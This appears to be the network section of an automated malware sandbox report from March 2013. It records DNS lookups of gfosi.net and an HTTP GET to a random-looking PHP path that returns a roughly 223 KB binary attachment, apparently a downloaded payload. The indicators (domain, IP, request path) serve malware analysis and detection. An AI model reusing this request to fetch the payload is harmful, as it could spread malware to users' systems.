TimestampSource IPDest IPChecksumCodeType
Mar 30, 2013 12:45:34.434437990 CET192.168.0.10195.186.1.1218327(Port unreachable)Destination Unreachable
DNS Queries
TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Mar 30, 2013 12:45:32.344860077 CET192.168.0.10195.186.1.1210x43b0Standard query (0)gfosi.netA (IP address)IN (0x0001)
Mar 30, 2013 12:45:33.343373060 CET192.168.0.10195.186.4.1210x43b0Standard query (0)gfosi.netA (IP address)IN (0x0001)
DNS Answers
TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Mar 30, 2013 12:45:34.333019972 CET195.186.4.121192.168.0.100x43b0No error (0)gfosi.net80.72.37.108A (IP address)IN (0x0001)
Mar 30, 2013 12:45:34.434057951 CET195.186.1.121192.168.0.100x43b0No error (0)gfosi.net80.72.37.108A (IP address)IN (0x0001)
HTTP Request Dependency Graph
  • gfosi.net
HTTP Packets
TimestampSource PortDest PortSource IPDest IPHeaderTotal Bytes Transfered (KB)
Mar 30, 2013 12:45:34.509351969 CET103180192.168.0.1080.72.37.108GET /ohifejdapljvzvyxnbkyrctwgxawrgcozrppgozrfqtfnlfzop-amtw-mvjpxxnomxnnftygwp-qjxqgljukd-ej.php HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: gfosi.net
Cache-Control: no-cache
0
Mar 30, 2013 12:45:41.062237024 CET80103180.72.37.108192.168.0.10HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 30 Mar 2013 11:45:40 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Cache-Control: public
Content-Disposition: attachment; filename=63462
Content-Transfer-Encoding: binary
Content-Length: 223610
1

Code Manipulation Behavior

System Behavior